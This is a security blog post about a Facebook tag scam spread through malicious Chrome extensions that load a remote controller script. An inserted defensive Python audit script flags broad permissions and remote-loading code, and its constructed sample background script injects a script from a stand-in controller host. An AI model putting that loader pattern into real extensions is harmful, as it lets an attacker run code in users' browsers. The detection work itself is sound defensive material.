Two weeks ago, we wrote about the re-emergence of tag scams on Facebook. What seemed at the time to be a basic worm has since become inspiration for multiple cyber-criminal gangs. This weekend, hackers took a more diversified approach to reaching victims’ browsers and wreaking havoc on Facebook walls.
Today’s scam is much more complex than the one described in the previous post. It all starts with an inciting image disguised as a video, posted on a user’s wall. Again, the scam message tags up to 20 friends, which helps it spread.
If the user is curious enough to click the link, they are taken to an external page via an anonymizing service. The destination page is a Facebook clone that shows an alleged YouTube video.
However, Windows or Mac OS X users running Chrome are prompted to download a malicious browser extension that was snuck into the official Google Chrome Store.
At the time of writing, more than 4,200 users had installed it. There are three such extensions that we know of (one of them, called Koksty, specifically targets the Russian social network vKontakte). All of these Chrome extensions are still online; we have reported them to Google for takedown.
The extensions themselves are what propagate the scam to victims. Because they run inside the browser, they can perform any action on the user’s behalf, such as reading and modifying the data on the websites the user visits.
Encrypted controller code that loads the Facebook share payload
When decrypted, the code points to another website controlled by the attacker; the sssssefv.js file loaded from that website is the controller script for this scam wave.
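The two traits that make this extension dangerous are exactly the ones a defender can look for when triaging an installed extension: host access broad enough to read and modify every site the user visits, and shipped code that is only a loader for logic fetched from a remote server at run time. The following is an added example, not code from the original post or from the extensions it describes; it audits a Chrome extension’s manifest.json and script files for those two indicators. The manifest, the background script, the extension name, the file names and the URLs are all constructed samples.

```python
"""Heuristic audit of a Chrome extension for the two traits the scam above relies on:
broad host access (read/modify any site the user visits) and run-time loading of
remote code. Added example, not from the original post; all sample data below is
constructed and every file name and URL is hypothetical."""
import json
import re

# Host patterns that grant access to every site the user visits.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# API permissions that let an extension observe or act on the user's browsing.
SENSITIVE_PERMISSIONS = {"tabs", "webRequest", "webRequestBlocking", "cookies", "history"}

# Static indicators that the shipped code is only a loader for code fetched later.
REMOTE_LOAD_PATTERNS = {
    "remote_script_src": re.compile(r"\.src\s*=\s*['\"]https?://", re.I),
    "eval_call": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\batob\s*\("),
    "external_fetch": re.compile(r"\bfetch\s*\(\s*['\"]https?://", re.I),
}


def audit_manifest(manifest):
    """Return human-readable findings for a parsed manifest.json (MV2 or MV3)."""
    findings = []
    # MV2 puts host patterns in "permissions"; MV3 moves them to "host_permissions".
    for perm in list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", [])):
        if perm in BROAD_HOST_PATTERNS:
            findings.append(f"broad host access: {perm}")
        elif perm in SENSITIVE_PERMISSIONS:
            findings.append(f"sensitive permission: {perm}")
    for script in manifest.get("content_scripts", []):
        for match in script.get("matches", []):
            if match in BROAD_HOST_PATTERNS:
                findings.append(f"content script injected into all sites: {match}")
    return findings


def audit_script(source):
    """Return the names of remote-loading indicators present in one JS source file."""
    return sorted(name for name, rx in REMOTE_LOAD_PATTERNS.items() if rx.search(source))


def audit_extension(manifest, scripts):
    """Combine manifest and script findings into a triage verdict.

    `scripts` maps file name -> JavaScript source. An extension that can touch every
    site AND injects a script from a remote server matches the profile described in
    the post, so that combination is rated "high".
    """
    findings = [("manifest.json", f) for f in audit_manifest(manifest)]
    for name, source in scripts.items():
        findings.extend((name, f) for f in audit_script(source))
    broad = any("broad host" in f or "all sites" in f for _, f in findings)
    remote = any(f == "remote_script_src" for _, f in findings)
    if broad and remote:
        verdict = "high"
    elif findings:
        verdict = "medium"
    else:
        verdict = "low"
    return verdict, findings


# Constructed sample: a manifest shaped like a loader extension (hypothetical name/files).
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 2,
  "name": "Video Player Plugin",
  "version": "1.0",
  "permissions": ["tabs", "<all_urls>", "storage"],
  "content_scripts": [{"matches": ["*://*/*"], "js": ["content.js"]}],
  "background": {"scripts": ["background.js"]}
}
""")

# Constructed sample: a background script that injects a remote script tag (fake URL).
SAMPLE_BACKGROUND_JS = """
var cfg = atob('QUJDRA==');
var s = document.createElement('script');
s.src = 'http://controller.example.invalid/loader.js';
document.head.appendChild(s);
"""

# Constructed sample: a narrowly scoped extension for comparison.
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Notes",
    "version": "1.0",
    "permissions": ["storage"],
    "host_permissions": ["https://notes.example.invalid/*"],
}

if __name__ == "__main__":
    for label, manifest, scripts in (
        ("loader", SAMPLE_MANIFEST, {"background.js": SAMPLE_BACKGROUND_JS}),
        ("benign", BENIGN_MANIFEST, {}),
    ):
        verdict, findings = audit_extension(manifest, scripts)
        print(f"{label}: {verdict}")
        for where, finding in findings:
            print(f"  {where}: {finding}")
```

These checks are triage heuristics, not a verdict: plenty of legitimate extensions request `<all_urls>`, and obfuscated loaders can hide the URL from a simple regex. The useful signal is the combination, which is why the verdict only reaches "high" when broad host access and a remote script injection appear together.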
Oddly enough, the Facebook payload features multiple code comments such as “kur ti bon do foto tjera e kthen qysh ke , se qetash spo tbojn fotot”, which might hint that the hacker group responsible for this is of Albanian origin.
This controller script handles everything: it creates the anonymized links, fetches inciting photos to use as bait for the Facebook posts, creates short URLs for every new post, and much more. It is a fully automated Facebook scam infrastructure.
So now you know how it all happens. Remember: don’t click anything that looks fishy, regardless of how shocking or inciting it appears. Hackers count on your curiosity to make you part of the scam. Stay safe!